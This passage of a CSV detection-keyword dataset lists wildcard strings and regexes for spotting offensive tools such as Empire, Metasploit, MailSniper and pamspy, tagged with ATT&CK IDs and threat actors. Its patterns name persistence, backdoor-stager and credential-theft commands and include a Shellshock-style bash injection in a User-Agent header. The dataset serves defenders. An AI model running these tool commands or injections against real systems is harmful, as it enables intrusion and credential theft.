- T1125 - T1102.002 - T1157","TA0004 - TA0006 - 
TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*uselistener onedrive*",".{0,1000}uselistener\sonedrive.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usemodule persistence/*",".{0,1000}usemodule\spersistence\/.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*usemodule powershell/persistence*",".{0,1000}usemodule\spowershell\/persistence.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*usemodule privesc/*",".{0,1000}usemodule\sprivesc\/.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*useplugin csharpserver*",".{0,1000}useplugin\scsharpserver.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - 
T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*UsePrtAdminAccount*",".{0,1000}UsePrtAdminAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*UsePrtImperonsationAccount*",".{0,1000}UsePrtImperonsationAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*user aborted during DBMS fingerprint.*",".{0,1000}user\saborted\sduring\sDBMS\sfingerprint\..{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*user Inveigh*",".{0,1000}user\sInveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*--user orbitaldump*",".{0,1000}\-\-user\sorbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*user_eq_pass_valid_cme_*.txt*",".{0,1000}user_eq_pass_valid_cme_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 
Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*--user_file*--password_file*",".{0,1000}\-\-user_file.{0,1000}\-\-password_file.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*user_password.rb*",".{0,1000}user_password\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*user_to_secretsdump.py*",".{0,1000}user_to_secretsdump\.py.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*user|username|login|pass|password|pw|credentials*",".{0,1000}user\|username\|login\|pass\|password\|pw\|credentials.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*User-Agent: *echo; echo; /bin/bash -c *",".{0,1000}User\-Agent\:\s.{0,1000}echo\;\secho\;\s\/bin\/bash\s\-c\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*--user-data-dir=C:\\chrome-dev-profile23 --remote-debugging-port=9222*",".{0,1000}\-\-user\-data\-dir\=C\:\\\\chrome\-dev\-profile23\s\-\-remote\-debugging\-port\=9222.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*UserEnum*",".{0,1000}UserEnum.{0,1000}","offensive_tool_keyword","UserEnum","The three scripts provided here allow one to establish if a user exist on a Windows domain. without providing any authentication. 
These user enumeration scripts use the DsrGetDcNameEx2.CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.","T1210.001 - T1213 - T1071.001","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/sensepost/UserEnum","1","1","N/A","N/A","3","211","47","2023-11-02T12:55:25Z","2018-05-21T16:55:58Z" "*UserHunterImplant*",".{0,1000}UserHunterImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Username to use for ADWS Connection. Format: domain\\user or user@domain*",".{0,1000}Username\sto\suse\sfor\sADWS\sConnection\.\sFormat\:\sdomain\\\\user\sor\suser\@domain.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*username-anarchy *",".{0,1000}username\-anarchy\s.{0,1000}","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. 
Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","0","N/A","N/A","7","680","120","2024-02-28T16:57:48Z","2012-11-07T05:35:10Z" "*UsernameAsPasswordCreds.txt*",".{0,1000}UsernameAsPasswordCreds\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*userpass_cme_check*",".{0,1000}userpass_cme_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*userpass_kerbrute_check*",".{0,1000}userpass_kerbrute_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*UserPassBruteForce*",".{0,1000}UserPassBruteForce.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*users/public/troubleshooting_log.log*",".{0,1000}users\/public\/troubleshooting_log\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*users\\public\\elevationstation.js*",".{0,1000}users\\\\public\\\\elevationstation\.js.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*users\\usethis\\NewFile.txt*",".{0,1000}users\\\\usethis\\\\NewFile\.txt.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*users\public\example.bin*",".{0,1000}users\\public\\example\.bin.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*users\public\temp.bin*",".{0,1000}users\\public\\temp\.bin.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*users_asreproast.txt*",".{0,1000}users_asreproast\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_dcsrp_full.txt*",".{0,1000}users_dcsrp_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_kerberoasting.txt*",".{0,1000}users_kerberoasting\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - 
enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_list_cme_ldap_nullsess_*",".{0,1000}users_list_cme_ldap_nullsess_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*users_list_kerbrute_*",".{0,1000}users_list_kerbrute_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*users_list_ridbrute_*",".{0,1000}users_list_ridbrute_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*users_no_req_pass.txt*",".{0,1000}users_no_req_pass\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - 
TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_no_req_pass_full.txt*",".{0,1000}users_no_req_pass_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*Uses eBPF to dump secrets use by PAM (Authentication) module*",".{0,1000}Uses\seBPF\sto\sdump\ssecrets\suse\sby\sPAM\s\(Authentication\)\smodule.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*usestager *backdoor*",".{0,1000}usestager\s.{0,1000}backdoor.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usestager *ducky*",".{0,1000}usestager\s.{0,1000}ducky.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usestager *launcher_bat*",".{0,1000}usestager\s.{0,1000}launcher_bat.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - 
